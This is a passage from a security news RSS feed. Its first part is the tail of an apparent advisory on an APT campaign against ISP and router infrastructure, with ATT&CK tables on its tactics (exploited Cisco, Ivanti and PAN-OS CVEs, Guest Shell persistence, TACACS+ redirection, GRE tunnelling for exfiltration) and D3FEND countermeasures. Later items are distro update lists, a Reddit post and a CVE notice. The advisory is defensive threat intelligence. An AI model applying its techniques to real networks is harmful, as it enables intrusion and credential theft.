<td><a href="https://attack.mitre.org/versions/v17/techniques/T1583/003/" target="_blank" title="T1583.003">T1583.003</a></td>
<td>Leverage VPS as infrastructure</td>
</tr>
<tr>
<td>Compromise Infrastructure: Network Devices</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1584/008/" target="_blank" title="T1584.008">T1584.008</a></td>
<td>Compromise intermediate routers</td>
</tr>
<tr>
<td>Obtain Capabilities: Exploits</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1588/005/" target="_blank" title="T1588.005">T1588.005</a></td>
<td>Utilize publicly available code (siet.py) to exploit vulnerable devices </td>
</tr>
<tr>
<td>Obtain Capabilities: Tool</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1588/002/" target="_blank" title="T1588.002">T1588.002</a></td>
<td>Utilize publicly available tooling (e.g., map.tcl, tclproxy.tcl, wodSSHServer) </td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><strong>Table 10</strong>: Initial Access</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Exploit Public-Facing Application</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1190/" target="_blank" title="T1190">T1190</a></td>
<td>Exploit publicly known CVEs </td>
</tr>
<tr>
<td>Trusted Relationship</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1199/" target="_blank" title="T1199">T1199</a></td>
<td>Leverage trusted connections between providers to pivot between networks</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><strong>Table 11</strong>: Execution</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>System Services</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1569/" target="_blank" title="T1569">T1569</a></td>
<td>Executing commands via SNMP</td>
</tr>
<tr>
<td>Container Administration Command</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1609/" target="_blank" title="T1609">T1609</a></td>
<td>Use Guest Shell to load open-source tools and as a jump point for reconnaissance and follow-on actions in the environment</td>
</tr>
<tr>
<td>Command and Scripting Interpreter: Python</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1059/006/" target="_blank" title="T1059.006">T1059.006</a></td>
<td>Use Python script siet.py </td>
</tr>
<tr>
<td>Command and Scripting Interpreter: Network Device CLI</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1059/008/" target="_blank" title="T1059.008">T1059.008</a></td>
<td>Use built-in CLI on network devices to execute native commands</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><strong>Table 12</strong>: Persistence</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Create Account: Local Account</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1136/001/" target="_blank" title="T1136.001">T1136.001</a></td>
<td>Create new local users on network devices for persistence</td>
</tr>
<tr>
<td>Container Service</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1543/005/" target="_blank" title="T1543.005">T1543.005</a></td>
<td>Leverage Linux-based Guest Shell containers, natively supported in a variety of Cisco OS software</td>
</tr>
<tr>
<td>Account Manipulation: SSH Authorized Keys</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1098/004/" target="_blank" title="T1098.004">T1098.004</a></td>
<td>Regain entry into environments via SSH into network devices</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><strong>Table 13</strong>: Privilege Escalation</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Exploitation for Privilege Escalation</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1068/" target="_blank" title="T1068">T1068</a></td>
<td>Exploit CVE-2023-20273 to gain root-level user privileges</td>
</tr>
<tr>
<td>Brute Force: Password Cracking</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1110/002/" target="_blank" title="T1110.002">T1110.002</a></td>
<td>Brute force passwords with weak encryption in obtained configuration files</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><strong>Table 14</strong>: Defense Evasion</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Obfuscated Files or Information: Command Obfuscation</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1027/010/" target="_blank" title="T1027.010">T1027.010</a></td>
<td>Obfuscate paths with “double encoding”</td>
</tr>
<tr>
<td>Obfuscated Files or Information</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1027/" target="_blank" title="T1027">T1027</a></td>
<td>Obfuscate source IP addresses in system logs, as actions may be recorded as originating from local IP addresses </td>
</tr>
<tr>
<td>Impair Defenses: Disable or Modify System Firewall</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1562/004/" target="_blank" title="T1562.004">T1562.004</a></td>
<td>Modify ACLs, adding IP addresses to bypass security policies and permit traffic from a threat actor-controlled IP address</td>
</tr>
<tr>
<td>Deploy Container</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1610/" target="_blank" title="T1610">T1610</a></td>
<td>Deploy virtual container (e.g., Guest Shell) on network infrastructure to persist and evade monitoring services</td>
</tr>
<tr>
<td>Indicator Removal</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1070/" target="_blank" title="T1070">T1070</a></td>
<td>Delete and/or clear logs</td>
</tr>
<tr>
<td>Indicator Removal: Clear Persistence</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1070/009/" target="_blank" title="T1070.009">T1070.009</a></td>
<td>Use Guest Shell destroy command to deactivate and uninstall Guest Shell container and return all resources to the system</td>
</tr>
<tr>
<td>Network Boundary Bridging</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1599/" target="_blank" title="T1599">T1599</a></td>
<td>Abuse peering connections </td>
</tr>
</tbody>
</table>
<p> </p>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><strong>Table 15</strong>: Credential Access</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Network Sniffing</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1040/" target="_blank" title="T1040">T1040</a></td>
<td>Passively collect packet capture (PCAP) from networks for configurations and credentials</td>
</tr>
<tr>
<td>Modify Authentication Process</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1556/" target="_blank" title="T1556">T1556</a></td>
<td>Modify a router’s TACACS+ server configuration to point to an APT actor-controlled IP address to capture authentication attempts or modify AAA configurations to use less secure authentication methods</td>
</tr>
<tr>
<td>OS Credential Dumping</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1003/" target="_blank" title="T1003">T1003</a></td>
<td>Collect router configuration with weak Cisco Type 7 passwords</td>
</tr>
<tr>
<td>Brute Force: Password Cracking</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1110/002/" target="_blank" title="T1110.002">T1110.002</a></td>
<td>Brute force weak hashed Cisco Type 5 password</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><strong>Table 16</strong>: Discovery</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>System Information Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1082/" target="_blank" title="T1082">T1082</a></td>
<td>Leverage CLI on network devices to gather system information</td>
</tr>
<tr>
<td>System Network Configuration Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1016/" target="_blank" title="T1016">T1016</a></td>
<td>Enumerate interfaces/VRFs/routing/ACLs and related network settings from the device CLI/SNMP</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><strong>Table 17</strong>: Lateral Movement</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Remote Services</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1021/" target="_blank" title="T1021">T1021</a></td>
<td>Enumerate and alter the SNMP configurations for other devices in the same community group</td>
</tr>
<tr>
<td>Remote Services: SSH</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1021/004/" target="_blank" title="T1021.004">T1021.004</a></td>
<td>Enable SSH servers and open external-facing ports on network devices to maintain encrypted remote access</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><strong>Table 18</strong>: Collection</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Archive Collected Data</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1560/" target="_blank" title="T1560">T1560</a></td>
<td>Compile configurations and packet captures</td>
</tr>
<tr>
<td>Data from Configuration Repository: SNMP (MIB Dump)</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1602/001/" target="_blank" title="T1602.001">T1602.001</a></td>
<td>Target MIB to collect network information via SNMP</td>
</tr>
<tr>
<td>Data from Configuration Repository: Network Device Configuration Dump</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1602/002/" target="_blank" title="T1602.002">T1602.002</a></td>
<td>Acquire credentials by collecting network device configurations</td>
</tr>
<tr>
<td>Data from Local System</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1005/" target="_blank" title="T1005">T1005</a></td>
<td>Passively collect PCAP from specific ISP customer networks</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><strong>Table 19</strong>: Command and Control</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Proxy</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1090/" target="_blank" title="T1090">T1090</a></td>
<td>Use VPS for C2</td>
</tr>
<tr>
<td>Proxy: Multi-hop Proxy</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1090/003/" target="_blank" title="T1090.003">T1090.003</a></td>
<td>Leverage open source multi-hop pivoting tools, such as STOWAWAY, to build chained relays for command and control and operator access</td>
</tr>
<tr>
<td>Application Layer Protocol</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1071/" target="_blank" title="T1071">T1071</a></td>
<td>Open and expose a variety of different services (e.g., Secure Shell [SSH], Secure File Transfer Protocol [SFTP], Remote Desktop Protocol [RDP], File Transfer Protocol [FTP], HTTP, HTTPS)</td>
</tr>
<tr>
<td>Non-Standard Port</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1571/" target="_blank" title="T1571">T1571</a></td>
<td>Utilize non-standard ports to evade detection by security monitoring tools that focus on standard port activity</td>
</tr>
<tr>
<td>Protocol Tunneling</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1572/" target="_blank" title="T1572">T1572</a></td>
<td>Create tunnels over protocols such as GRE, mGRE, or IPsec on network devices</td>
</tr>
<tr>
<td>Non-Application Layer Protocol</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1095/" target="_blank" title="T1095">T1095</a></td>
<td>Use GRE/IPsec to carry C2 over non-application layer protocols</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><a class="ck-anchor"><strong>Table 20</strong></a>: Exfiltration</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Exfiltration over Alternative Protocol</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1048/003/" target="_blank" title="T1048.003">T1048.003</a></td>
<td>Use tunnels, such as IPsec and GRE, to conduct C2 and exfiltration activities</td>
</tr>
</tbody>
</table>
<h2><a class="ck-anchor"><strong>Appendix B: CVEs exploited</strong></a></h2>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><strong>Table 21</strong>: Exploited CVE information</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>CVE </strong></th>
<th role="columnheader"><strong>Vendor/Product </strong></th>
<th role="columnheader"><strong>Details</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2024-21887" target="_blank" title="CVE-2024-21887">CVE-2024-21887</a></td>
<td>Ivanti Connect Secure and Ivanti Policy</td>
<td>Command injection vulnerability, commonly chained after <a href="https://www.cve.org/CVERecord?id=CVE-2023-46805" target="_blank" title="CVE-2023-46805">CVE-2023-46805</a> (authentication bypass)</td>
</tr>
<tr>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2024-3400" target="_blank" title="CVE-2024-3400">CVE-2024-3400</a></td>
<td>Palo Alto Networks PAN-OS GlobalProtect</td>
<td>Arbitrary file creation leading to OS command injection, allowing for unauthenticated remote code execution (RCE) on firewalls when GlobalProtect is enabled on specific versions/configurations</td>
</tr>
<tr>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2023-20273" target="_blank" title="CVE-2023-20273">CVE-2023-20273</a></td>
<td>Cisco IOS XE</td>
<td>Web management user interface post-authentication command injection/privilege escalation (commonly chained with <a href="https://www.cve.org/CVERecord?id=CVE-2023-20198" target="_blank" title="CVE-2023-20198">CVE-2023-20198</a> for initial access to achieve code execution as root)</td>
</tr>
<tr>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2023-20198" target="_blank" title="CVE-2023-20198">CVE-2023-20198</a></td>
<td>Cisco IOS XE</td>
<td>Authentication bypass vulnerability to create unauthorized administrative accounts</td>
</tr>
<tr>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2018-0171" target="_blank" title="CVE-2018-0171">CVE-2018-0171</a></td>
<td>Cisco IOS and IOS XE</td>
<td>Smart Install remote code execution vulnerability</td>
</tr>
</tbody>
</table>
<p> </p>
<h2><a class="ck-anchor"><strong>Appendix C: MITRE D3FEND Countermeasures</strong></a></h2>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><strong>Table 22</strong>: MITRE D3FEND countermeasures</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Countermeasure Title </strong></th>
<th role="columnheader"><strong>ID </strong></th>
<th role="columnheader"><strong>Details </strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW15743482 BCX8">
<div class="OutlineElement Ltr SCXW15743482 BCX8">
<p>Platform Monitoring </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW15743482 BCX8">
<div class="OutlineElement Ltr SCXW15743482 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:PlatformMonitoring/" target="_blank" title="D3-PM ">D3-PM </a></p>
</div>
</div>
</td>
<td>Regularly review network device (especially router) logs and configurations for evidence of any unexpected, unapproved, or unusual activity, especially for changes to network tunnels, AAA configurations, ACLs, packet captures or network mirroring, and virtual containers</td>
</tr>
<tr>
<td>Network Traffic Community Deviation</td>
<td><a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation/" target="_blank" title="D3-NTCD">D3-NTCD</a></td>
<td>Check for unexpected GRE or other tunneling protocols, unexpected TACACS+ or RADIUS servers, or other unusual traffic</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW265882884 BCX8">
<div class="OutlineElement Ltr SCXW265882884 BCX8">
<p>Outbound Traffic Filtering </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW265882884 BCX8">
<div class="OutlineElement Ltr SCXW265882884 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering/" target="_blank" title="D3-OTF">D3-OTF</a> </p>
</div>
</div>
</td>
<td>Disable outbound connections from management interfaces</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW12378772 BCX8">
<div class="OutlineElement Ltr SCXW12378772 BCX8">
<p>Application Configuration Hardening </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW12378772 BCX8">
<div class="OutlineElement Ltr SCXW12378772 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening/" target="_blank" title="D3-ACH">D3-ACH </a></p>
</div>
</div>
</td>
<td>Disable all unused ports and protocols (both traffic and management protocols), disable Cisco smart install, disable Cisco Guest Shell, use only strong cryptographic algorithms</td>
</tr>
<tr>
<td>Change Default Password</td>
<td><a href="https://d3fend.mitre.org/technique/d3f:ChangeDefaultPassword/" target="_blank" title="D3-CFP">D3-CFP</a></td>
<td>Change all default administrative credentials and SNMP community strings</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW144528759 BCX8">
<div class="OutlineElement Ltr SCXW144528759 BCX8">
<p>Credential Hardening </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW144528759 BCX8">
<div class="OutlineElement Ltr SCXW144528759 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:CredentialHardening/" target="_blank" title="D3-CH">D3-CH</a> </p>
</div>
</div>
</td>
<td>Disable password authentication where possible, use strong PKI-based or multifactor authentication, use strong cryptographic password storage settings (i.e., Cisco Type 8), and use lockouts to slow brute force attempts</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW160303247 BCX8">
<div class="OutlineElement Ltr SCXW160303247 BCX8">
<p>Software Update </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW160303247 BCX8">
<div class="OutlineElement Ltr SCXW160303247 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:SoftwareUpdate/" target="_blank" title="D3-SU">D3-SU</a> </p>
</div>
</div>
</td>
<td>Update software to patch known vulnerabilities and upgrade devices to supported versions</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW175383487 BCX8">
<div class="OutlineElement Ltr SCXW175383487 BCX8">
<p>Network Isolation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW175383487 BCX8">
<div class="OutlineElement Ltr SCXW175383487 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:NetworkIsolation/" target="_blank" title="D3-NI">D3-NI</a> </p>
</div>
</div>
</td>
<td>Implement management-plane isolation and control-plane policing (CoPP) to keep all network management traffic separate from data plane traffic</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW19928184 BCX8">
<div class="OutlineElement Ltr SCXW19928184 BCX8">
<p>Inbound Traffic Filtering </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW19928184 BCX8">
<div class="OutlineElement Ltr SCXW19928184 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering/" target="_blank" title="D3-ITF">D3-ITF</a> </p>
</div>
</div>
</td>
<td>Ensure management VRFs cannot receive traffic from the data plane</td>
</tr>
</tbody>
</table>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (bind, bind9.16, libsoup, mariadb:10.5, and sssd), Debian (chromium, keystone, and swift), Fedora (apptainer, buildah, chromium, fcitx5, fcitx5-anthy, fcitx5-chewing, fcitx5-chinese-addons, fcitx5-configtool, fcitx5-hangul, fcitx5-kkc, fcitx5-libthai...]]></description>
<link>https://tsecurity.de/de/3085632/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3085632/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 07 Nov 2025 15:08:30 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (bind, bind9.16, libsoup, mariadb:10.5, and sssd), <b>Debian</b> (chromium, keystone, and swift), <b>Fedora</b> (apptainer, buildah, chromium, fcitx5, fcitx5-anthy, fcitx5-chewing, fcitx5-chinese-addons, fcitx5-configtool, fcitx5-hangul, fcitx5-kkc, fcitx5-libthai, fcitx5-m17n, fcitx5-qt, fcitx5-rime, fcitx5-sayura, fcitx5-skk, fcitx5-table-extra, fcitx5-unikey, fcitx5-zhuyin, GeographicLib, libime, mbedtls, mingw-poppler, mupen64plus, python-starlette, webkitgtk, and xen), <b>Mageia</b> (dcmtk, java-1.8.0-openjdk, java-11-openjdk, java-17-openjdk, java-latest-openjdk, libvpx, and sqlite3), <b>Oracle</b> (bind, bind9.16, kernel, libsoup, libsoup3, osbuild-composer, qt6-qtsvg, sssd, and valkey), <b>Red Hat</b> (kernel and kernel-rt), <b>SUSE</b> (bind, gpg2, ImageMagick, python-Django, and runc), and <b>Ubuntu</b> (linux-azure, linux-azure-4.15, linux-fips, linux-aws-fips, inux-gcp-fips, linux-gcp, linux-gcp-6.8, linux-gke, linux-intel-iot-realtime, linux-realtime, linux-raspi-5.4, and linux-realtime, linux-realtime-6.8).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by Debian (unbound), Fedora (deepin-qt5integration, deepin-qt5platform-plugins, dtkcore, dtkgui, dtklog, dtkwidget, fcitx-qt5, fcitx5-qt, fontforge, gammaray, golang-github-openprinting-ipp-usb, kddockwidgets, keepassxc, kf5-akonadi-server, kf5-frameworkintegrati...]]></description>
<link>https://tsecurity.de/de/3083609/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3083609/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 06 Nov 2025 15:21:14 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (unbound), <b>Fedora</b> (deepin-qt5integration, deepin-qt5platform-plugins, dtkcore, dtkgui, dtklog, dtkwidget, fcitx-qt5, fcitx5-qt, fontforge, gammaray, golang-github-openprinting-ipp-usb, kddockwidgets, keepassxc, kf5-akonadi-server, kf5-frameworkintegration, kf5-kwayland, plasma-integration, python-qt5, qadwaitadecorations, qt5, qt5-qt3d, qt5-qtbase, qt5-qtcharts, qt5-qtconnectivity, qt5-qtdatavis3d, qt5-qtdeclarative, qt5-qtdoc, qt5-qtgamepad, qt5-qtgraphicaleffects, qt5-qtimageformats, qt5-qtlocation, qt5-qtmultimedia, qt5-qtnetworkauth, qt5-qtquickcontrols, qt5-qtquickcontrols2, qt5-qtremoteobjects, qt5-qtscript, qt5-qtscxml, qt5-qtsensors, qt5-qtserialbus, qt5-qtserialport, qt5-qtspeech, qt5-qtsvg, qt5-qttools, qt5-qttranslations, qt5-qtvirtualkeyboard, qt5-qtwayland, qt5-qtwebchannel, qt5-qtwebengine, qt5-qtwebkit, qt5-qtwebsockets, qt5-qtwebview, qt5-qtx11extras, qt5-qtxmlpatterns, qt5ct, and xorg-x11-server), <b>Mageia</b> (binutils, gstreamer1.0-plugins-bad, libsoup, libsoup3, mediawiki, net-tools, and tigervnc, x11-server, and x11-server-xwayland), <b>Red Hat</b> (tigervnc), <b>SUSE</b> (aws-efs-utils, fetchmail, flake-pilot, ImageMagick, java-1_8_0-ibm, java-1_8_0-openjdk, kernel-devel, kubecolor, OpenSMTPD, sccache, tiff, and zellij), and <b>Ubuntu</b> (linux, linux-aws, linux-aws-6.14, linux-gcp, linux-gcp-6.14,
 linux-oem-6.14, linux-oracle, linux-oracle-6.14, linux-raspi,
 linux-realtime, linux, linux-aws, linux-gkeop, linux-hwe-6.8, linux-ibm, linux-ibm-6.8,
 linux-lowlatency, linux-lowlatency-hwe-6.8, linux-nvidia,
 linux-nvidia-lowlatency, linux, linux-aws, linux-kvm, linux-lts-xenial, linux-oracle-6.8, linux-realtime-6.14, poppler, python-django, and various linux-* packages).]]></content:encoded>
</item>
<item>
<title><![CDATA[Music player closest to modern Winamp UI's realtime queue system]]></title>
<description><![CDATA[In Modern Winamp UIs, whenever you play any track from the library the queue is immediately populated with whatever is in the library view on the left - your entire library, search results, etc - and there's a hotkey to quickly randomise the order of the queue, letting you shuffle your queue whil...]]></description>
<link>https://tsecurity.de/de/3073875/linux-tipps/music-player-closest-to-modern-winamp-uis-realtime-queue-system/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3073875/linux-tipps/music-player-closest-to-modern-winamp-uis-realtime-queue-system/</guid>
<pubDate>Sat, 01 Nov 2025 02:36:39 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>In Modern Winamp UIs, whenever you play any track from the library the queue is immediately populated with whatever is in the library view on the left - your entire library, search results, etc - and there's a hotkey to quickly randomise the order of the queue, letting you shuffle your queue while actually seeing what tracks are coming up next, then move those tracks around or queue anything else you want to in the order you desire. After years and years of using Winamp I really struggle to adjust to not having this functionality. It seems to be missing from almost every music player I've tried on Linux thus far. I've tried a lot, and if anyone can suggest something that works this way I'd be very grateful. Gmusicbrowser is the closest I've found, but its age is showing - the version I downloaded off the AUR won't even launch on hyprland and the UI is much uglier than most other players.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Reddit_Zowie_Fan"> /u/Reddit_Zowie_Fan </a> <br> <span><a href="https://i.redd.it/nyfnvhm46gyf1.jpeg">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1oku9zl/music_player_closest_to_modern_winamp_uis/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-29270 | Deep Sea Electronics DSE855 up to 1.1.26 realtime.cgi access control (EUVD-2025-37375)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in Deep Sea Electronics DSE855 up to 1.1.26. The impacted element is an unknown function of the file realtime.cgi. Executing manipulation can lead to improper access controls.

This vulnerability is tracked as CVE-2025-29270. The attack is...]]></description>
<link>https://tsecurity.de/de/3073811/sicherheitsluecken/cve-2025-29270-deep-sea-electronics-dse855-up-to-1126-realtimecgi-access-control-euvd-2025-37375/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3073811/sicherheitsluecken/cve-2025-29270-deep-sea-electronics-dse855-up-to-1126-realtimecgi-access-control-euvd-2025-37375/</guid>
<pubDate>Sat, 01 Nov 2025 01:07:45 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/?kb.risk">critical</a> has been identified in <a href="https://vuldb.com/?product.deep_sea_electronics:dse855">Deep Sea Electronics DSE855 up to 1.1.26</a>. The impacted element is an unknown function of the file <em>realtime.cgi</em>. Executing manipulation can lead to improper access controls.

This vulnerability is tracked as <a href="https://vuldb.com/?source_cve.330833">CVE-2025-29270</a>. The attack is only possible within the local network. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (ipa, kernel, and thunderbird), Debian (gdk-pixbuf, gegl, gimp, intel-microcode, raptor2, request-tracker4, and request-tracker5), Fedora (samba and wireshark), Mageia (haproxy, nginx, openssl, and python-django), Oracle (kernel and thunderbird), Red...]]></description>
<link>https://tsecurity.de/de/3057526/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3057526/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 23 Oct 2025 15:21:34 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
